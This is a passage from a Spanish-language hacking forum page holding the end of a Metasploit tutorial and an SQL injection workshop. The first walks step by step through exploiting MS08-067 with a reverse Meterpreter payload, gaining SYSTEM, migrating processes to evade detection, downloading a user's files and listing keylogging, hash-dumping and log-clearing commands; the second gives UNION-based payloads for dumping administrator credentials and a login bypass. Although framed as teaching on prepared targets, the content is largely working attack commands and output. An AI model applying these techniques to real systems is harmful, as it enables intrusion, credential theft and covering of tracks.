msf auxiliary(writable) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >

Mismo modulo, mismo target y al parecer el modulo auxiliar se ejecuta, pero no muestra que esta habilitado el usuario anonimo en el servidor. Cumple perfectamente su proposito.


scanner/smb/version: Con este modulo podremos ver exactamente que SO y version se esta ejecutando en el objetivo:

Código: You are not allowed to view links. Register or Login
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 10.21.49.12
msf auxiliary(version) > run

[*] 10.21.49.12 is running Windows XP Service Pack 2 (language: Spanish)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(version) >

Y asi se simple obtenemos el SO y version de nuestro objetivo.


Habran notado que en la mayoria de los modulos no mostre las opciones porque creo que son cosas que ya deberian de tomar en cuenta como necesarias y verlas por ustedes mismos. Utilicen los comandos basicos para navegar por la gran variedad de modulos auxiliares que nos proporciona Metasploit Framework y no tengan miedo de ver su definicion, opciones. Ya estan listos para conocer mas modulos auxiliares por ustedes mismos.

Como vemos, Metasploit Framework nos proporciona modulos auxiliares a nivel web que nos podrian ser de mucha ayuda en cualquier momento, ademas de modulos auxiliares que nos sirven para obtener informacion fundamental sobre nuestro objetivo.

Con esto hemos terminado por hoy. Creo que ya indiscutiblemente estamos listos para conocer el espectacular METERPRETER.





Conociendo Meterpreter


Despues de una basica (pero buena) introduccion a algunas de las funcionalidades de Metasploit Framework, hemos podido llegar a obtener nuestra primer shell, pero esto no termina aqui. Una de las primeras cosas que quisieramos hacer despues de obtener una shell, seria mantener nuestra presencia en el equipo remoto y es aqui en donde nos encontramos con el conjunto de scripts avanzados orientado a sistemas windows llamado Meterpreter.

Meterpreter nos permite automatizar el trabajo post-explotacion mediante scripts avanzados que nos facilitan tareas como la interaccion con el registro de windows (regedit), borrado de rastros, descargar/subir archivos, obtencion de passwords del sistema (hash dump), ejecucion de procesos, terminacion de procesos, edicion de archivos de texto, time stamp, etc.

Una de las cosas mas impresionantes de Meterpreter es la migracion de procesos; esto significa, que cuando explotamos la vulnerabilidad objetivo, no se crea un nuevo proceso (como normalmente se hace) sino que Meterpreter se carga en la memoria de uno de los procesos abiertos permitiendonos asi ser lo menos ruidosos que podamos y pasarnos de un proceso a otro sin ningun problema. Con esto no significa que seamos indetectables, pero nos ayuda a evitar ser detectados.

Como utilizamos Meterpreter?

Meterpreter lo encontramos entre los PAYLOADS y como cualquier payload, lo seleccionamos despues de haber puesto en uso un exploit. Comunmente no necesitamos cambiar las opciones por default, solo establecer el host local (LHOST) si el payload es inverso.


En este ejemplo vamos a utilizar los pasos seguidos en “Mi primera Intrusion con MSF” pero la unica diferencia sera el PAYLOAD a utilizar: Meterpreter.
Código: You are not allowed to view links. Register or Login
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.21.49.12
RHOST => 10.21.49.12
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.21.17.215
LHOST => 10.21.17.215
msf exploit(ms08_067_netapi) >

Como vemos, hemos puesto en uso el exploit utilizado anteriormente y hemos seleccionado como PAYLOAD Meterpreter con conexion inversa. Les recomiendo, como siempre, utilizar tanto el comando info como el comando show options que seran nuestros aliados siempre. Depues de estar seguros que las opciones y parametros estan establecidos correctamente estamos listos para explotar el objetivo y obtener una sesion con Meterpreter. Que mejor que ver una imagen :D



Excelente, hemos explotado el sistema y abierto una session Meterpreter como lo esperabamos. Ahora conozcamos  algunas de las funciones que nos proporciona Meterpreter y no hay mejor forma de hacerlo que utilizando el comando help o ?:

  Comando

  background     
  exit         
  help               
  irb           
  migrate       
  quit         
  run           
  use           
  cat           
  cd           
  del           
  download     
  edit         
  getlwd       
  getwd       
  lcd           
  lpwd         
  ls           
  mkdir         
  pwd           
  rm           
  rmdir         
  upload       
  ipconfig     
  clearev       
  execute       
  getpid       
  getuid       
  kill         
  ps           
  reboot       
  reg           
  shell         
  shutdown     
  sysinfo   
  keyscan_dump   
  keyscan_start 
  keyscan_stop   
  hashdump
Descripcion

Envia al segundo plano la sesion activa.
Termina la sesion abierta de Meterpreter
Muestra la ayuda
Nos lanza al interprete de Ruby (irb).
Migra de un proceso a otro
Termina la sesion abierta de Meterpreter
Ejecuta un script de Meterpreter. Presionando dos veces TAB veremos los disponibles.
Carga una o mas extension de Meterpreter. Presionando dos veces TAB veremos los disponibles.
Muestra el contenido de un archivo de texto.
Cambia a un directorio
Elimina un archivo especifico
Descarga un archivo o directorio al equipo local
Edita un archivo
Muestra el directorio local en el que estamos trabajando
Muestra el directorio remoto en el que estamos trabajando
Cambia a un directorio local
Muestra el directorio local en el que estamos trabajando
Muestra los archivos contenidos en un directorio
Crea un directorio
Muestra el derectorio remoto en el que estamos trabajando
Elimina un archivo especifico
Elimina un directorio especifico
Sube un archivo o directorio al equipo remoto
Muestra las interfaces de red
Elimina los logs almacenados en la aplicacion “Visor de Sucesos”
Ejecuta un comando
Muestra la identificacion del proceso en el que estamos
Muestra el usuario en el que estamos actualmente
Termina un proceso
Muestra los procesos en ejecucion
Reinicia el equipo remoto
Modifica e interactua con el registro remoto
Nos lanza a una consola en el equipo remoto
Apaga el equipo remoto
Nos muestra informacion sobre el equipo remoto
Muestra las pulsaciones de teclas grabadas
Empieza a capturar pulsaciones de teclas
Detiene la captura de pulsaciones de teclas
Muestra el contenido de la SAM (Contiene los usuarios y passwords encriptadas)

Despues de haber visto la descripcion de algunos de los comandos disponibles en Meterpreter, vamos a hacer uso de unos cuantos, los demas tendran que verlos por ustedes mismos :D

Una vez hemos logrado explotar el sistema, seria bueno saber con que usuario estamos trabajando:
Código: You are not allowed to view links. Register or Login
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Jeje, como vemos tenemos todos los permisos sobre el sistema sin ninguna limitacion. Ahora lo que tenemo que hacer es migrar a otro proceso despues de haber hecho la intrusion para asegurar que nuestra conexion no se termine si el proceso (aplicacion) que hemos explotado se cierra, pero antes veamos en el proceso que estamos actualmente:

Código: You are not allowed to view links. Register or Login
meterpreter > getpid        #Aqui obtenemos el PID en el que estamos
Current pid: 1076        #Despues de la explotacion, Meterpreter se metio en este proceso
meterpreter > ps

Process list
============

    PID   Name              Path
    ---   ----              ----
    580   smss.exe          \SystemRoot\System32\smss.exe
    644   csrss.exe         \??\C:\WINDOWS\system32\csrss.exe
    676   winlogon.exe      \??\C:\WINDOWS\system32\winlogon.exe
    720   services.exe      C:\WINDOWS\system32\services.exe
    732   lsass.exe         C:\WINDOWS\system32\lsass.exe
    912   svchost.exe       C:\WINDOWS\system32\svchost.exe
    980   svchost.exe       C:\WINDOWS\system32\svchost.exe
    1076  svchost.exe       C:\WINDOWS\System32\svchost.exe
    1124  svchost.exe       C:\WINDOWS\system32\svchost.exe
    1232  svchost.exe       C:\WINDOWS\system32\svchost.exe
    1380  alg.exe           C:\WINDOWS\System32\alg.exe
    1492  Explorer.EXE      C:\WINDOWS\Explorer.EXE
    1656  spoolsv.exe       C:\WINDOWS\system32\spoolsv.exe
    1832  VBoxTray.exe      C:\WINDOWS\system32\VBoxTray.exe
    1848  ctfmon.exe        C:\WINDOWS\system32\ctfmon.exe
    2032  WVSScheduler.exe  C:\Archivos de programa\Acunetix\Web Vulnerability Scanner 6\WVSScheduler.exe

meterpreter >

Lo que tenemos que hacer es simplemente pasarle al comando migrate el PID al que queremos migrar. Lo hacemos asi:

Código: You are not allowed to view links. Register or Login
meterpreter > migrate 1492
[*] Migrating to 1492...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 1492
meterpreter >

Y en este proceso (Explorer) creo que podriamos mantenernos estables para hacer nuestro trabajo xD

Ahora veamos un poco como desplazarnos por el sistema de archivos del equipo remoto:

Código: You are not allowed to view links. Register or Login
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd c:\
meterpreter > pwd
c:\
meterpreter > ls

Listing: c:\
============

Mode                      Size       Type  Last modified              Name
----                             ----       ----  -------------              ----
100555/r-xr-xr-x    115578    fil   2009-09-07 15:08:08 -0600  3c.exe
100777/rwxrwxrwx  0           fil   2009-06-19 14:45:31 -0600  AUTOEXEC.BAT
40777/rwxrwxrwx  0             dir   2009-11-23 14:16:55 -0600  Archivos de programa
100444/r--r--r--       4952       fil   2001-08-24 09:00:00 -0600  Bootfont.bin
100666/rw-rw-rw-  0             fil   2009-06-19 14:45:31 -0600  CONFIG.SYS
40777/rwxrwxrwx  0            dir   2009-06-19 15:37:30 -0600  Documents and Settings
100444/r--r--r--        0            fil   2009-06-19 14:45:31 -0600  IO.SYS
40777/rwxrwxrwx  0            dir   2009-09-22 14:41:37 -0600  Inetpub
100444/r--r--r--     0               fil   2009-06-19 14:45:31 -0600  MSDOS.SYS
40555/r-xr-xr-x     0              dir   2009-06-20 01:22:24 -0600  MSOCache
100555/r-xr-xr-x   47564      fil   2004-08-03 13:38:34 -0600  NTDETECT.COM
40777/rwxrwxrwx  0            dir   2009-06-19 14:59:32 -0600  PFiles
40777/rwxrwxrwx  0            dir   2009-06-19 15:05:15 -0600  System Volume Information
40777/rwxrwxrwx  0            dir   2009-09-22 14:46:04 -0600  WINDOWS
100666/rw-rw-rw- 2565       fil   2009-06-20 01:01:58 -0600  all
100444/r--r--r--      51           fil   2009-12-13 15:28:09 -0600  autorun.inf
100666/rw-rw-rw- 211         fil   2009-06-19 14:39:45 -0600  boot.ini
100555/r-xr-xr-x    113233   fil   2009-08-26 04:22:00 -0600  hx.exe
100555/r-xr-xr-x    113455   fil   2009-09-01 13:23:59 -0600  i0yva6.exe
100555/r-xr-xr-x    112442   fil   2009-08-31 10:55:28 -0600  mt2.exe
100444/r--r--r--       250640  fil   2004-08-03 13:59:42 -0600  ntldr
100666/rw-rw-rw-  402653184  fil   2009-12-13 08:17:25 -0600  pagefile.sys

meterpreter >

Como vemos, la navegacion es muy simple, practicamente es lo mismo que una consola normal.

Ahora ingresemos a la carpeta “Documents and Settings” para ver que usuarios podemos encontrar en el equipo remoto:

Código: You are not allowed to view links. Register or Login
meterpreter > cd "Documents and Settings"
meterpreter > ls

Listing: c:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2009-06-19 15:37:30 -0600  .
40777/rwxrwxrwx  0     dir   1979-12-31 17:00:00 -0600  ..
40777/rwxrwxrwx  0     dir   2009-06-19 14:48:48 -0600  Administrador
40777/rwxrwxrwx  0     dir   2009-06-19 14:43:23 -0600  All Users
40777/rwxrwxrwx  0     dir   2009-06-19 14:45:55 -0600  Default User
40777/rwxrwxrwx  0     dir   2009-06-19 15:05:10 -0600  LocalService
40777/rwxrwxrwx  0     dir   2009-06-19 14:47:12 -0600  NetworkService
40777/rwxrwxrwx  0     dir   2009-07-01 13:11:33 -0600  Ronny Josue

meterpreter >

Y asi, de esta forma podemos navegar por todo el sistema de archivos del equipo remoto. Ahora veamos como podriamos descargar un archivo:

Código: You are not allowed to view links. Register or Login
meterpreter > pwd
C:\Documents and Settings\Ronny Josue\Mis documentos\Mis archivos recibidos\Install\AdobeReader
meterpreter > ls

Listing: C:\Documents and Settings\Ronny Josue\Mis documentos\Mis archivos recibidos\Install\AdobeReader
========================================================================================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40777/rwxrwxrwx   0         dir   2009-11-23 14:16:00 -0600  .
40777/rwxrwxrwx   0         dir   2009-11-23 14:16:00 -0600  ..
100777/rwxrwxrwx  16661154  fil   2007-06-12 19:04:20 -0600  AR81Lite_ES.exe

meterpreter > lpwd
/root
meterpreter > download AR81Lite_ES.exe
[*] downloading: AR81Lite_ES.exe -> AR81Lite_ES.exe
[*] downloaded : AR81Lite_ES.exe -> AR81Lite_ES.exe
meterpreter >

Y asi de facil descargamos archivos del equipo remoto al local, el mismo procedimiento se sigue para subir archivos, solo hay que tomar en cuenta el directorio en el que estamos y el directorio al que subiriamos el archivo.

Hasta este punto ya conocen un poquito el manejo de algunos comandos, por si quieren ver alguna descripcion de un comando especifico, pueden poner comando -h en donde “comando” es uno de los comandos dispobles en Meterpreter, para ver cuales estan disponibles utilices el comando Help o ?.

Ahora veamos como podriamos interacturar con una shell por si eso es lo que nos interesa:

Código: You are not allowed to view links. Register or Login
meterpreter > cd \
meterpreter > shell
Process 1104 created.
Channel 4 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Como vemos, el comando shell nos invoca una shell de windows abrindose en el directorio en donde la invoquemos. Tambien lo podriamos hacer asi:

Código: You are not allowed to view links. Register or Login
meterpreter > execute -i -H -f cmd.exe
Process 1396 created.
Channel 5 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

En donde:
-i: Interactua con la aplicacin a ejecutar
-H: Ejecuta el comando en modo oculto
-f: La aplicacion a ejecutar
 
Para volver a Meterpreter solo escribimos el comando exit. Por los momentos veremos solo estos comandos, los demas los vamos a ir conociendo a medida vallamos avanzado en el tutorial ;)


Creo que el tutorial se podria considerar concluido. Agredezco a los interesados y los que hicieron sus aportes de MSF. Cualquier duda, comentario o critica no duden a hacermelo saber ya sea por este mismo post o por MP.


Autor: Rcart
Fuente: CPH

19
Bugs y Exploits / Taller Inyecciones SQL [Hacker_Zero]
« en: Abril 14, 2010, 02:27:28 pm »
Taller Inyecciones SQL


Eres libre de distribuír ésta información siempre y cuando mantengas ésta cabecera.


Autor: Hacker_Zero
Fuente: You are not allowed to view links. Register or Login


Éste documento ha sido realizado con fines exclusivamente didácticos. Todos los ejemplos aquí posteados se realizaron en un servidor previamente preparado por el autor. Ni la web ni el autor se responsabilizan de otros usos que otros usuarios le puedan dar.


Empezamos

¿Que es una inyección SQL?

Pues muy fácil, una inyección SQL nos permite modificar el comportamiento de las consultas a la base de datos permitiendonos acceder a datos no públicos o modificar la base de datos a nuestro antojo.

Muchas veces se habla de que ésta és una técnica complicada, que es necesario aprender SQL. Ésto es falso, podemos inyectar código de una forma totalmente mecánica sin entender el porqué del fallo, lo que lo hace en una técnica peligrosa, aunque también hay técnicas de inyección SQL avanzadas.

Un poco de teoría

Aunque podríamos limitarnos aprender un proceso y utilizarlo mecanicamente sin entender nada, limitarnos a éso sería echar a perder una buena técnica, así que analizaremos el porque de los ataques de inyección SQL. Para ésta misión utilizaremos una base de datos de pruebas donde podremos practicar a nuestras anchas:


You are not allowed to view links. Register or Login



1- Averiguando si es vulnerable

Empezaremos por el Ejercicio nº 1. En éste caso, la variable id está mal depurada, aquí el código vulnerable:


CÓDIGO
$user = $_GET['id'>;
(...)
$sql = mysql_query("SELECT * FROM `users` WHERE id=".$user) or die (mysql_error());



¿Como lo sabemos si no podemos ver el codigo fuente? Pues usaremos valores verdaderos y falso para ver como responde. Si ejecutamos:

CÓDIGO
You are not allowed to view links. Register or Login


La consulta se realizara como:

CÓDIGO
SELECT * FROM `users` WHERE id=1 and 1=1


Y si ejecutamos:

You are not allowed to view links. Register or Login

La consulta será:

CÓDIGO
SELECT * FROM `users` WHERE id=1 and 1=0


Como 1 no es igual a 0, en éste último caso la consulta no se realizará, por lo que no aparecen los datos de la base de datos en los campos de la web. Vale sabemos que es vulnerable, y ahora qué?

Tenemos que tener claro nuestro propósito, obtener información de la base de datos, en éste caso el nombre de usuario y contraseña del administrador. Como la podemos obtener? Pues lo que haremos será realizar una consulta en la variable vulnerable para que nos muestre los datos que queremos.


2- Averiguar el número de Columnas

Lo primero que tenemos que hacer es averiguar el número de columnas que tiene la tabla para poder hacer nosotros consultas, para eso se utiliza order by:

You are not allowed to view links. Register or Login

Como la tabla tiene más de 1 campo, se mostrará correctamente, seguimos:

You are not allowed to view links. Register or Login

Y así hasta llegar a 7, que se producirá un error:

You are not allowed to view links. Register or Login

Pues ya lo tenemos, tiene 6 campos, que fué él valor más alto que se mostró correctamente.


3- Haciendo nuestra consulta

Ahora que ya tenemos el número de columnas, 6, podemos hacer nuestra consulta:

You are not allowed to view links. Register or Login

Union: Se usa para combinar los resultados de varias sentencias SELECT.

Select: Nos permite consultar los datos almacenados en una tabla de la base de datos.

Luego ponemos las 6 columnas numerados del 1 al 6, lo que nos permitirá ver que campos se imprimen, los cuales nos permitirán a nosotros imprimir resultados. Vemos que los campos que se imprimen son 1,4,5,6. Que podemos hacer con ellos? Pues imprimir información, un ejemplo:

You are not allowed to view links. Register or Login()

version(): Devuelve la versión del servidor SQL.
database(): Devuelve el nombre de la base de datos.
user(): Devuelve el nombre de usuario conectado a la base de datos.
connection_id(): Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID.

El 2 y el 3 no nos valen para imprimir resultados ya que no se muestran en pantalla.


4- Buscando nuestra tabla

Ahora que ya podemos imprimir lo que queramos en esos campos, buscaremos la tabla que contiene el usuario y contraseña de los usuarios. Para recorrer las tablas de una base de datos se utilizaremos lo siguiente:

You are not allowed to view links. Register or Login

Al ejecutar eso, nos mostrará el nombre de una tabla, pero no es la que queremos. Para recorrer las tablas en busca de la tabla que nos interesa, aumentaremos progresivamente el limit. Por ejemplo para ver la siguiente tabla:

You are not allowed to view links. Register or Login

y la siguiente:

You are not allowed to view links. Register or Login

Así continuamos hasta encontrar una que pueda contener lo que nosotros queremos, el usuario y contraseña del administrador. Traceamos hasta llegar al 17:

You are not allowed to view links. Register or Login

Users, ésa parece ser la tabla donde se guarda esos datos ( podría haberse llamado también admin, access, o cualquier nombre sospechoso).


5- Buscando nuestras columnas

Ahora que ya tenemos la tabla, sólo nos queda saber que datos imprimir. Nosotros queremos el nombre de usuario y la contraseña, pero tenemos que saber como se llaman esas columnas para poderlas imprimir. Tracear columnas es similar a tracear tablas, se usa lo siguiente:


You are not allowed to view links. Register or Login+
where+table_name=char(NombreDeLaTablaEnAscii)+and+column_name+like+char(37,64,37)
En NombreDeLaTablaEnAscii irá el nombre de la tabla en código ascii separado por comas, aquí podemos ver las conversiones, luego subo un programa para hacer ésto de una forma más cómoda.

La inyección quedaría así:


You are not allowed to view links. Register or Login+
information_schema.columns+where+table_name=char(117,115,101,114,115)+and+column_name+like+char(37,64,37)

Oh, pero no se muestra nada! Tranquilo, ahora tenemos que ir traceando. Vamos aumentando el valor de 64 porgresivamente e iremos viendo diferentes nombres de columnas. Probemos con 65:


You are not allowed to view links. Register or Login+
information_schema.columns+where+table_name=char(117,115,101,114,115)+and+column_name+like+char(37,65,37)

Ah bien ya tenemos una de las columnas que buscabamos la que guarda el pass! Vale pues ahora a por la otra, la del usuario, seguimos traceando:

El 67 no nos muestra nada, el 68 nos muestra id que no nos interesa... 69 lo tenemos!


6- Imprimiendo los datos

Ya tenemos todo! Sabemos que tenemos que leer la columna Pass y la columna nombre de la tabla users, pues vamos a armar la inyección:

You are not allowed to view links. Register or Login

Bien ya está! Tenemos el nombre de usuario y contraseña del administrador! Bueno, pues aprovechamos que tenemos todo y sacamos la de otro user:

You are not allowed to view links. Register or Login

Ahí mandamos imprimir el nomre y pass de la tabla users donde el id es 2, el id del Admin suele ser 1, como es el primero se puede omitir y lo imprime igual.

Como sería para los demás users? Pues igual, solo cambiando el id.

Pues ésto fue todo por hoy, lo dejamos aquí de momento, aunque pronto actualizaré el post para poner más información de algunos comandos que hoy pasé así muy rápido.

Y aprovechad You are not allowed to view links. Register or Login para hacer pruebas, intentad sacar los users y pass vosotros solos, o provado cosas para ir cogiendo soltura.



ACTUALIZACIÓN

Bueno, pues el otro día Krackwar me presentó una función que desconocía ( De ese 99% que desconozco, xD): group_concat()

¿Para que sirve ésta función?

Bueno, algunos habréis tenido problemas o os lió algo lo de buscar tablas y columnas con el método anterior, o simplemente os parecía muy largo el proceso, bueno, y si pudieramos imprimir todas las tablas y columnas con una única sentencia? Ahí entra group_concat(), concadena miembros de un grupo como puede ser el nombre de las tablas y el nombre de las columnas, mejor con un ejemplo no? xD:

Para las tablas:

You are not allowed to view links. Register or Login),
2,3,4,5,6+from+information_schema.tables

Y para las columnas:

You are not allowed to view links. Register or Login),
2,3,4,5,6+from+information_schema.columns+where+table_name=char(117,115,101,114,115)



Ejercicio nº 2

Bueno pues para continuar el taller explicando otro tipo de inyección, me ayudaré del ejercicio 2 del servidor de pruebas de You are not allowed to view links. Register or Login . En éste ejercicio lo más interesante es entender la inyección.

-El código vulnerable

[code=sql>SELECT nombre FROM users Where nombre='$login' and Pass='$pass'[/code>

Nos deja pasar si al comprobar en la tabla users el nombre se corresponde con la contraseña. Nuestro objetivo es tener acceso sin saber el pass, podríamos modificar de alguna forma esa sentencia para que nos dejara pasar? Pues si.

-Nuestra inyección

Si en el campo login introducimos ADMIN y en password escribimos por ejemplo: Zero' OR '1'='1 la sentencia quedaría:

[code=sql>SELECT nombre FROM users Where nombre='ADMIN' and Pass='Zero' OR '1'='1'[/code>

Nos deja pasar si al comprobar en la tabla users al nombre ADMIN le corresponde la contraseña Zero o si 1 es igual a 1

Como 1 es igual a 1, nos dejará pasar ;D. Hay muchas más posibilidades, lo único que hay que hacer es modificar la sentencia para que de true y nos deje pasar.


20
E-Zines / [Libro] El poder de las Redes
« en: Abril 10, 2010, 09:54:37 am »
El poder de las Redes

You are not allowed to view links. Register or Login

Contenido:

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. Register or Login

Páginas: [1] 2